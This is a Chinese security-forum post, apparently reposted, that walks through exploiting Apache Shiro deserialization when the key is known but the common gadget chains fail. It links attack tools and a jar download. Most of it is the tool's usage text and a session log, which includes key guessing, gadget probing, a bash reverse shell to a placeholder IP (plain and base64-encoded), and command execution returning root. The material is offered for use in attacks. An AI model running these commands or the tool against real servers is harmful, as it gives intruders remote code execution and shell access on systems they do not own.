安全矩阵

 找回密码
 立即注册
搜索
查看: 1335|回复: 0

Shiro有key无链的情况下的利用工具

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-10-22 16:05:23 | 显示全部楼层 |阅读模式
Shiro有key无链的情况下的利用工具
本文转自公众号:乌云安全

前言
在攻防和渗透的时候经常遇到shrio有Key没链的情况,因为常规使用的那两款工具当检测到有Key没有利用链的时候还是无法进一步拿shell,所以说一下另一款工具。有Key没链可以尝试一下,但是能不能成功就看运气了。
这俩工具有key无链,常规链无法利用。




https://github.com/altEr1125/ShiroAttack2
https://github.com/SummerSec/ShiroAttack
https://github.com/wyzxxz/shiro_rce_tool

其它链JRMPClient

shiro_tool这款工具可以检测其他不是常规的利用链,看一下这个shiro_tool,还挺多的


download_url:https://toolaffix.oss-cn-beijing ... 1128/shiro_tool.jar

优化一些功能:
1、spring/tomcat回显,执行命令的时候,x=whoami 就行
2、批量检测是否shiro
3、目标服务器不出网的情况下探测
4、key 目前 401 个。
5、默认会加载当前目录下的 keys.txt 文件,可以把key放到keys.txt里,和该jar放同一个目录,会自动加载。


> java -jar shiro_tool.jar
Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck     --> skip check target is shiro or not.
skip        --> all gadget default can be use
redirect    --> follow redirect default:false
randomagent --> random useragent
notcheckall --> not check all gadget
useragent=  --> set useragent
cookiename= --> default: rememberMe      不是rememberMe的时候用
x=          --> print result
cmd=        --> set command to run
dcmd=       --> set command to run, command format base64 string
key=        --> set a shiro key
req=        --> request body file   request body file 抓包保存到文件里,这里写文件名
keys=       --> keys file       自定义key的文件,key按行分割,即每行写一个
java -cp shiro_tool.jar shiro.Check urls=批量url文件  redirect
java -cp shiro_tool.jar shiro.Check http://www.shiro.com


[admin@ shiro] java -jar shiro_tool.jar https://xx.xx.xx.xx/         
[-] target: https://xx.xx.xx.xx/
[-] target is use shiro
[-] start guess shiro key.
[-] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check URLDNS
  • find: URLDNS can be use
    [-] check CommonsBeanutils1
  • find: CommonsBeanutils1 can be use
    [-] check CommonsBeanutils2
    [-] check CommonsCollections1
    [-] check CommonsCollections2
    [-] check CommonsCollections3
    [-] check CommonsCollections4
    [-] check CommonsCollections5
    [-] check CommonsCollections6
    [-] check CommonsCollections7
    [-] check CommonsCollections8
    [-] check CommonsCollections9
    [-] check CommonsCollections10
    [-] check CommonsCollectionsK1
    [-] check CommonsCollectionsK2
    [-] check CommonsCollectionsK3
    [-] check CommonsCollectionsK4
    [-] check Groovy1
  • find: Groovy1 can be use
    [-] check JSON1
  • find: JSON1 can be use
    [-] check Spring1
  • find: Spring1 can be use
    [-] check Spring2
    [-] check JRMPClient
  • find: JRMPClient can be use
  • JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
    0: URLDNS
    1: CommonsBeanutils1
    2: Groovy1
    3: JSON1
    4: Spring1
    5: JRMPClient
    [-] please enter the number(0-6)
    3
    [-] use gadget: JSON1
  • command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
  • command example: curl dnslog.xx.com
  • if need base64 command, input should startwith bash=/powershell=/python=/perl=
    [-] please enter command, input q or quit to quit
    > curl json.dnslog.xx.cn
    [-] start process command: curl json.dnslog.xx.cn
    [-] please enter command, input q or quit to quit
    > bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
    [-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
    [-] please enter command, input q or quit to quit
    > output=on
    [-] print payload mode on.
    [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
    > whoami
    kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq
    82987eI8FZxA8ckaX8LsMNHdParxVS9aYg0Oxl91WD5GztG6Dmg/QO/sjxi+kX/sFpHgqwtG4MCQoogH
    Jkhnj73PI6Wn8AJWQyXoOGNMkyboGcEm0Ti1h+WMGQEqw57tRl7Pjr0pMr2oZcUj9huwC/Lfr090FX7v
    rPrU5JnQm2Qo7ZrMPnxENXs0yMT6HfU75OejeF6kXbWTaGlvfByscF1ljoDR/k2txdQ1eK4nZ4ReOAqM
    uUeeaXwirEw2kg58GktvB2Ghw4egXJBQUdP3H8iE+zrkf12YlPs/RAOq8w0mWfvwB7EnCW3Z83YP8vV1
    +reLT9oNyUpCfjKyQVodnpZJY7If4F9al8He7E832RR3mhFvsjJDyNFTbB4TPrRqFDehSVuHib5qkh0s
    0YjvCGErxDLH9pFS4G9rNYQeAnXBKeNzS5q2O0xCe5xg4X6l8R6XsU2/V1d6wd27U7u18+DJlo/v58vj
    SyUtUaEAAuMN9C30Rr+r7Tk9MVC55eS8l82fURpUwttcRADhJ0esKHAFFAkwnisbAb4Uugz3IADojYlH
    BNFtWFuV2dsuqkionEROKLIdVHJGR8URmk79v8lbLbpCWI3cTCf81SwwBoYylKXCyHX2X08VlEUvuHWk
    ypx9gVvDuQQQFTGP4ljwpU1NlQPqxaLXmnZ5TyJN2sycL9s8VWMYls4uFATtMkpXXcwaQGFVjCzFrABv
    [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
    > x=whoami
    root

    [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
    > quit
    [-] start process command: quit
    [-] quit

    工具下载

    https://github.com/altEr1125/ShiroAttack2

    https://github.com/SummerSec/ShiroAttack

    https://github.com/wyzxxz/shiro_rce_tool

    https://toolaffix.oss-cn-beijing ... 1128/shiro_tool.jar


  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    小黑屋|安全矩阵

    GMT+8, 2024-11-27 22:38 , Processed in 0.018486 second(s), 19 queries .

    Powered by Discuz! X4.0

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表